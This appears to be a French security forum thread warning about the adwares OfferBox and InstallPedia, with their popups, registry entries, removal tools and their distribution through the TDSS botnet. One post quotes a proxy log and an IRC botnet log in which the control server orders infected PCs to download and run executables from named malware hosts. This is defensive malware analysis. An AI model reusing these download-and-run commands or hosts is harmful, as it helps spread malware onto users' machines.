OfferBox / InstallPedia - http://c.ads-*-host.com/ads.php?c=

Malekal_morte
Messages : 116655
Inscription : 10 sept. 2005 13:57

OfferBox / InstallPedia - http://c.ads-*-host.com/ads.php?c=

par Malekal_morte »

Encore pour signaler deux autres adwares qui sont assez répandues depuis quelques semaines :
  • OfferBox
  • InstallPedia
Voici un exemple de popup de publicités qu'OfferBox peut ouvrir pendant le surf :
Image

Le principe est toujours le même, en installant des programmes dits gratuits avec des procédés parfois limites, on installe ces logiciels qui par la suite ouvriront des popups de publicités sur le PC pour rémunérer les auteurs.
Les personnes qui installent un peu tout et n'importe quoi et qui ne lisent pas les conditions d'utilisations des PC seront touchées.

La popup Offerbox qui explique que l'on va avoir des popups de publicités et un peu de tracking d'informations :
Image

Exemple de procédés limites avec : Offerbox se désinstalle très bien par ajout/suppression de programmes, voir sur le site : http://www.offerbox.com/fr/aide/desinstaller-navigateur

En ce qui concerne Offerbox, voir aussi la discussion (qui concerne aedgency) : Réponse à Malekal_morte sur: Moovida et Deenero

~~

InstallPedia modifie la page de démarrage du navigateur WEB, actuellement vers l'adresse : custom-search-fr.com
Les lignes HijackThis relatifs à InstallPedia :
O4 - HKLM\..\Run: [IP Network] C:\Program Files\InstallPedia\networker.exe
O23 - Service: service de mise a jour pour IP networker (IP netservices) - Unknown owner - C:\Program Files\InstallPedia\service.exe
ou
O4 - HKLM..\Run: [installer] C:\Program Files (x86)\Installer\lnetworker.exe ()
Rechercher IPUpdate, Installer pi InstallPedia dans ajout/suppression de programmes, s'il n'est pas présent vous pouvez utiliser Combofix pour le supprimer.

Pour s'en protéger, évitez d'installer les programmes proposées surtout via des publicités.
Soyez vigilant et lisez les conditions d'utilisation.
Activez la détection des PUP/LPI sur votre antivirus.

Voir les topics suivants :
http://forum.malekal.com/custom-search- ... 28733.html
http://forum.malekal.com/redirection-fi ... 28617.html
http://forum.malekal.com/ads-host-comme ... 30556.html

En complément, vous pouvez lire le sujet : Sur la ligne… : Légitime ou non légitime ? Malware or not malware ?
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 116655
Inscription : 10 sept. 2005 13:57

Re: OfferBox / InstallPedia

par Malekal_morte »

Malwarebyte devrait le supprimer sous le nom Adware.InstallPedia
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 116655
Inscription : 10 sept. 2005 13:57

Re: OfferBox / InstallPedia - http://c.ads-*-host.com/ads.ph

par Malekal_morte »

InstallPedia semble ouvrir des popups de pubs avec l'adresse : http://c.ads-*-host.com/ads.php?c=71
où * est un chiffre.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 116655
Inscription : 10 sept. 2005 13:57

Re: OfferBox / InstallPedia - http://c.ads-*-host.com/ads.ph

par Malekal_morte »

La détection de InstallPedia : http://forum.malekal.com/http-update-nt ... ml#p244092
Malwarebyte ne le détecte pas à chaque fois, vous pouvez utiliser AD-Remover pour le supprimer.

En outre le pack adware vient avec un programme BackupIP.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 116655
Inscription : 10 sept. 2005 13:57

Re: OfferBox / InstallPedia - http://c.ads-*-host.com/ads.ph

par Malekal_morte »

Sur ce lien, il est dit que le botnet TDSS installe Offerbox : http://blog.urlvoid.com/new-tdss-varian ... -software/

Petit zoom sur ce post de MalwareBot : http-get-ezdrop-exe-4910b18a623c549e2e1 ... 31858.html

Le setup.exe est téléchargé depuis un bot IRC

Image

Le malware droppe un fichier bundle.exe (ce qui sent le bon l'adware pour monétiser).
Image

bundle.exe lance à son tour OB.exe avec une belle icône....

Image

La suite on la devine... c'est l'installation d'Offerbox...
ce qui confirme ce qui a été donné dans le premier lien, à savoir qu'Offerbox via des affiliations est utilisé pour monétiser en étant distribué sur les PC infectés et contrôlés à distance.

Image

Image

Image

EDIT AVRIL 2011

Le même bot délivré par exploits sur site WEB - voir http-201-php-t32383.html :

Code : Tout sélectionner

1302638372.694    407 192.168.1.90 TCP_MISS/200 55833 GET http://91.201.66.5/d.php?f=18&e=4 - DIRECT/91.201.66.5 application/x-msdownload
Qui fait télécharger et exécuter d'autres malwares pour monétiser :
MODE [00_FRA_XP_2389781] -ix

JOIN #a1

:[00_FRA_XP_2389781]![email protected] JOIN :#a1

:Apache2.0 332 [00_FRA_XP_2389781] #a1 :.world1 -S|.world1 hxtp://digitaltoolsworld.in/install.48208.exe C:\up2.exe 1|.exp -S|.http hxtp://black-cash.com/a11.exe|.exp sv 10 0 0 -c|.exp sv 25 0 0 -b|.exp sv 50 3 0 -b -r -e

:Apache2.0 333 [00_FRA_XP_2389781] #a1 xxx 1302577475
:[00_FRA_XP_2389781]![email protected] JOIN :#ita

:Apache2.0 332 [00_FRA_XP_2389781] #ita :.world1 -S|.world1 hxttp://get.master.ppidropper.com/exe/4910b18a623c549e2e1bc53f6cc0682a4579fbf6/setup.exe C:\update.exe 1

:Apache2.0 333 [00_FRA_XP_2389781] #ita xxx 1302577481
:Apache2.0 NOTICE [00_FRA_XP_2389781] :*** You were forced to join #ita



[00_FRA_XP_2389781]![email protected] JOIN :#a1

:Apache2.0 332 [00_FRA_XP_2389781] #a1 :.world1 -S|.world1 hxtp://digitaltoolsworld.in/install.48208.exe C:\up2.exe 1|.exp -S|.hxtp http://black-cash.com/a11.exe|.exp sv 10 0 0 -c|.exp sv 25 0 0 -b|.exp sv 50 3 0 -b -r -e

:Apache2.0 333 [00_FRA_XP_2389781] #a1 xxx 1302577475
:[00_FRA_XP_2389781]![email protected] JOIN :#ita

:Apache2.0 332 [00_FRA_XP_2389781] #ita :.world1 -S|.world1 hxtp://get.master.ppidropper.com/exe/4910b18a623c549e2e1bc53f6cc0682a4579fbf6/setup.exe C:\update.exe 1

:Apache2.0 333 [00_FRA_XP_2389781] #ita xxx 1302577481
:Apache2.0 NOTICE [00_FRA_XP_2389781] :*** You were forced to join #ita
hxtp://get.master.ppidropper.com/exe/4910b18a623c549e2e1bc53f6cc0682a4579fbf6/setup.exe = Offerbox
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 116655
Inscription : 10 sept. 2005 13:57

Re: OfferBox / InstallPedia - http://c.ads-*-host.com/ads.ph

par Malekal_morte »

Offerbox proposé via MediaGet2 sur les faux sites de Warez qui propage Trojan.Win32.Jorik.Skor
=> https://www.malekal.com/2011/04/20/troj ... log-power/
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 116655
Inscription : 10 sept. 2005 13:57

Re: OfferBox / InstallPedia - http://c.ads-*-host.com/ads.ph

par Malekal_morte »

Un autre programme GPL repacké pour y bundle Offerbox/Fissa : EasyPCCleaner
Voir : https://www.malekal.com/2011/04/20/easy ... -et-fissa/
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
  • Sujets similaires
    Réponses
    Vues
    Dernier message

Revenir à « Adwares et PUPs (programmes indésirables) »